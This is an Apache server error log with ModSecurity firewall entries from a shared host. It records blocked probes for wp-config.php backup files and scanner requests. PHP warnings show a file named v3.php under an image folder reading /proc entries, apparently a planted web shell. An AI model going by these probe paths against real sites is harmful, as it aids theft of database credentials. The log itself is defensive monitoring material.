[Tue May 12 07:45:19.042789 2026] [core:error] [pid 1916576:tid 1916582] [client 4.193.137.131:30162] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:45:19.544852 2026] [core:error] [pid 1825287:tid 1825314] [client 4.193.137.131:30144] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:45:19.544909 2026] [core:error] [pid 1825287:tid 1825314] [client 4.193.137.131:30144] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:45:20.062523 2026] [core:error] [pid 1842385:tid 1842411] [client 4.193.137.131:30201] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:45:20.062561 2026] [core:error] [pid 1842385:tid 1842411] [client 4.193.137.131:30201] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 07:46:38.408094 2026] [security2:error] [pid 1825179:tid 1825216] [client 162.62.213.165:48222] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.nearoo.fr"] [uri "/"] [unique_id "agK-vtr1yOh9TvizezjNewAAAFI"]
[Tue May 12 07:46:56.275874 2026] [proxy:error] [pid 1916576:tid 1916583] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2090 (127.0.0.1:2090) failed
[Tue May 12 07:46:56.276899 2026] [proxy_http:error] [pid 1916576:tid 1916583] [client 31.32.194.37:19180] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 12 07:46:56.579657 2026] [security2:error] [pid 1844863:tid 1844871] [client 31.32.194.37:44299] ModSecurity: Warning. Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "440"] [id "920420"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/vnd.ms-sync.wbxml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "mail.nearoo.fr"] [uri "/___proxy_activesync/"] [unique_id "agK-0PaAnTZtx1_H_wzm-gAAAUI"]
[Tue May 12 07:46:56.580826 2026] [security2:error] [pid 1844863:tid 1844871] [client 31.32.194.37:44299] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.nearoo.fr"] [uri "/___proxy_activesync/"] [unique_id "agK-0PaAnTZtx1_H_wzm-gAAAUI"]
[Tue May 12 07:46:56.581158 2026] [security2:error] [pid 1844863:tid 1844871] [client 31.32.194.37:44299] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Request content type is not allowed by policy"] [tag "event-correlation"] [hostname "mail.nearoo.fr"] [uri "/___proxy_activesync/"] [unique_id "agK-0PaAnTZtx1_H_wzm-gAAAUI"]
[Tue May 12 07:46:57.451360 2026] [proxy:error] [pid 1844863:tid 1844871] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2090 (127.0.0.1:2090) failed
[Tue May 12 07:46:57.451446 2026] [proxy_http:error] [pid 1844863:tid 1844871] [client 31.32.194.37:44299] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 12 07:46:57.602200 2026] [proxy:error] [pid 1916576:tid 1916595] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2090 (127.0.0.1:2090) failed
[Tue May 12 07:46:57.602266 2026] [proxy_http:error] [pid 1916576:tid 1916595] [client 31.32.194.37:61910] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 12 07:46:57.739189 2026] [security2:error] [pid 1844863:tid 1844876] [client 31.32.194.37:43304] ModSecurity: Warning. Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "440"] [id "920420"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/vnd.ms-sync.wbxml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "mail.nearoo.fr"] [uri "/___proxy_activesync/"] [unique_id "agK-0faAnTZtx1_H_wzm_gAAAUc"]
[Tue May 12 07:46:57.740314 2026] [security2:error] [pid 1844863:tid 1844876] [client 31.32.194.37:43304] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.nearoo.fr"] [uri "/___proxy_activesync/"] [unique_id "agK-0faAnTZtx1_H_wzm_gAAAUc"]
[Tue May 12 07:46:57.740774 2026] [security2:error] [pid 1844863:tid 1844876] [client 31.32.194.37:43304] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Request content type is not allowed by policy"] [tag "event-correlation"] [hostname "mail.nearoo.fr"] [uri "/___proxy_activesync/"] [unique_id "agK-0faAnTZtx1_H_wzm_gAAAUc"]
[Tue May 12 07:46:58.234557 2026] [proxy:error] [pid 1844863:tid 1844876] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2090 (127.0.0.1:2090) failed
[Tue May 12 07:46:58.234636 2026] [proxy_http:error] [pid 1844863:tid 1844876] [client 31.32.194.37:43304] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 12 07:46:58.372378 2026] [proxy:error] [pid 1844863:tid 1844874] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2090 (127.0.0.1:2090) failed
[Tue May 12 07:46:58.372462 2026] [proxy_http:error] [pid 1844863:tid 1844874] [client 31.32.194.37:55642] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 12 07:46:58.476293 2026] [security2:error] [pid 1842385:tid 1842409] [client 31.32.194.37:60396] ModSecurity: Warning. Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "440"] [id "920420"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "application/vnd.ms-sync.wbxml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "mail.nearoo.fr"] [uri "/___proxy_activesync/"] [unique_id "agK-0hs7kySIUZ3ORnJVuAAAARI"]
[Tue May 12 07:46:58.477479 2026] [security2:error] [pid 1842385:tid 1842409] [client 31.32.194.37:60396] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.nearoo.fr"] [uri "/___proxy_activesync/"] [unique_id "agK-0hs7kySIUZ3ORnJVuAAAARI"]
[Tue May 12 07:46:58.477824 2026] [security2:error] [pid 1842385:tid 1842409] [client 31.32.194.37:60396] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Request content type is not allowed by policy"] [tag "event-correlation"] [hostname "mail.nearoo.fr"] [uri "/___proxy_activesync/"] [unique_id "agK-0hs7kySIUZ3ORnJVuAAAARI"]
[Tue May 12 07:46:58.943695 2026] [proxy:error] [pid 1842385:tid 1842409] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2090 (127.0.0.1:2090) failed
[Tue May 12 07:46:58.943778 2026] [proxy_http:error] [pid 1842385:tid 1842409] [client 31.32.194.37:60396] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 12 07:47:02.000921 2026] [authz_core:error] [pid 1842385:tid 1842394] [client 47.128.28.162:58972] AH01630: client denied by server configuration: /home/tchatboo/public_html/wp-includes/customize/error_log
[Tue May 12 07:47:12.702000 2026] [security2:error] [pid 1844863:tid 1844886] [client 43.134.178.104:49622] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.of-crystal-lake.net"] [uri "/vxx2/"] [unique_id "agK-4PaAnTZtx1_H_wznKgAAAVE"]
[Tue May 12 07:48:12.895067 2026] [autoindex:error] [pid 1922055:tid 1922069] [client 47.251.42.6:57764] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 07:48:27.327286 2026] [security2:error] [pid 1921844:tid 1921856] [client 170.106.161.78:45230] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agK_KyVy0GfyZVqx9_XumAAAAIk"]
[Tue May 12 07:49:33.023557 2026] [security2:error] [pid 1921844:tid 1921852] [client 172.212.217.10:53888] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ventes-privees-auto.fr"] [uri "/wp-config.php.backup"] [unique_id "agK_bSVy0GfyZVqx9_XuyAAAAIU"]
[Tue May 12 07:49:33.023757 2026] [security2:error] [pid 1921844:tid 1921852] [client 172.212.217.10:53888] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ventes-privees-auto.fr"] [uri "/wp-config.php.backup"] [unique_id "agK_bSVy0GfyZVqx9_XuyAAAAIU"]
[Tue May 12 07:49:34.622603 2026] [security2:error] [pid 1921844:tid 1921852] [client 172.212.217.10:53888] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ventes-privees-auto.fr"] [uri "/index.php"] [unique_id "agK_bSVy0GfyZVqx9_XuyAAAAIU"]
[Tue May 12 07:50:15.010151 2026] [security2:error] [pid 1922055:tid 1922059] [client 43.128.89.111:40580] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "letamsgarage.fr"] [uri "/"] [unique_id "agK_l2nv04BZw2-6THKbCgAAAMI"]
[Tue May 12 07:50:16.978159 2026] [security2:error] [pid 1921844:tid 1921863] [client 43.134.114.37:55974] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.jeanboyault.fr"] [uri "/hopeful-giraffe/"] [unique_id "agK_mCVy0GfyZVqx9_XvLgAAAJA"]
[Tue May 12 07:50:20.030608 2026] [security2:error] [pid 1922055:tid 1922062] [client 49.51.243.95:42166] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "labaujue.com"] [uri "/"] [unique_id "agK_nGnv04BZw2-6THKbGAAAAMU"]
[Tue May 12 07:50:20.653338 2026] [security2:error] [pid 1844863:tid 1844887] [client 43.128.89.111:60500] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "letamsgarage.fr"] [uri "/"] [unique_id "agK_nPaAnTZtx1_H_wzoGAAAAVI"], referer: http://letamsgarage.fr
[Tue May 12 07:50:25.276498 2026] [security2:error] [pid 1842385:tid 1842410] [client 49.51.243.95:45934] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/"] [unique_id "agK_oRs7kySIUZ3ORnJWggAAARM"], referer: http://labaujue.com
[Tue May 12 07:50:31.170042 2026] [security2:error] [pid 1922055:tid 1922067] [client 172.212.217.10:8195] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /backup.wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ventes-privees-auto.fr"] [uri "/backup.wp-config.php"] [unique_id "agK_p2nv04BZw2-6THKbNwAAAMo"]
[Tue May 12 07:50:31.170196 2026] [security2:error] [pid 1922055:tid 1922067] [client 172.212.217.10:8195] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ventes-privees-auto.fr"] [uri "/backup.wp-config.php"] [unique_id "agK_p2nv04BZw2-6THKbNwAAAMo"]
[Tue May 12 07:50:32.778764 2026] [security2:error] [pid 1922055:tid 1922067] [client 172.212.217.10:8195] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ventes-privees-auto.fr"] [uri "/index.php"] [unique_id "agK_p2nv04BZw2-6THKbNwAAAMo"]
[Tue May 12 07:51:14.366251 2026] [security2:error] [pid 1842385:tid 1842391] [client 180.153.236.249:35565] ModSecurity: Warning. Matched phrase "user-agent:" at REQUEST_HEADERS:User-Agent. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-913-SCANNER-DETECTION.conf"] [line "33"] [id "913100"] [rev "2"] [msg "Found User-Agent associated with security scanner"] [data "Matched Data: user-agent: found within REQUEST_HEADERS:User-Agent: user-agent:mozilla/5.0 (linux; android 10; k) applewebkit/537.36 (khtml, like gecko) chrome/131.0.0.0 mobile safari/537.36; 360spider"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-reputation-scanner"] [tag "OWASP_CRS/AUTOMATION/SECURITY_SCANNER"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.missmandarine.com"] [uri "/"] [unique_id "agK_0hs7kySIUZ3ORnJWyQAAAQE"], referer: https://www.missmandarine.com/
[Tue May 12 07:51:14.366798 2026] [security2:error] [pid 1842385:tid 1842391] [client 180.153.236.249:35565] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/"] [unique_id "agK_0hs7kySIUZ3ORnJWyQAAAQE"], referer: https://www.missmandarine.com/
[Tue May 12 07:51:14.747454 2026] [security2:error] [pid 1842385:tid 1842391] [client 180.153.236.249:35565] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Found User-Agent associated with security scanner"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agK_0hs7kySIUZ3ORnJWyQAAAQE"], referer: https://www.missmandarine.com/
[Tue May 12 07:52:04.373052 2026] [security2:error] [pid 1922055:tid 1922069] [client 172.212.217.10:8239] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /new-wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ventes-privees-auto.fr"] [uri "/new-wp-config.php"] [unique_id "agLABGnv04BZw2-6THKb9gAAAMw"]
[Tue May 12 07:52:04.373206 2026] [security2:error] [pid 1922055:tid 1922069] [client 172.212.217.10:8239] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ventes-privees-auto.fr"] [uri "/new-wp-config.php"] [unique_id "agLABGnv04BZw2-6THKb9gAAAMw"]
[Tue May 12 07:52:06.003315 2026] [security2:error] [pid 1922055:tid 1922069] [client 172.212.217.10:8239] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ventes-privees-auto.fr"] [uri "/index.php"] [unique_id "agLABGnv04BZw2-6THKb9gAAAMw"]
PHP Warning:  filesize(): stat failed for /proc/281/task/281/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/281/task/281/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/281/task/281/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/281/task/281/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/281/task/281/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/281/task/281/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 07:52:55.433571 2026] [security2:error] [pid 1842385:tid 1842402] [client 180.153.236.188:56147] ModSecurity: Warning. Matched phrase "user-agent:" at REQUEST_HEADERS:User-Agent. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-913-SCANNER-DETECTION.conf"] [line "33"] [id "913100"] [rev "2"] [msg "Found User-Agent associated with security scanner"] [data "Matched Data: user-agent: found within REQUEST_HEADERS:User-Agent: user-agent:mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/140.0.0.0 safari/537.36 edg/140.0.0.0; 360spider"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-reputation-scanner"] [tag "OWASP_CRS/AUTOMATION/SECURITY_SCANNER"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.missmandarine.com"] [uri "/"] [unique_id "agLANxs7kySIUZ3ORnJXtAAAAQw"], referer: https://www.missmandarine.com/
[Tue May 12 07:52:55.434176 2026] [security2:error] [pid 1842385:tid 1842402] [client 180.153.236.188:56147] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/"] [unique_id "agLANxs7kySIUZ3ORnJXtAAAAQw"], referer: https://www.missmandarine.com/
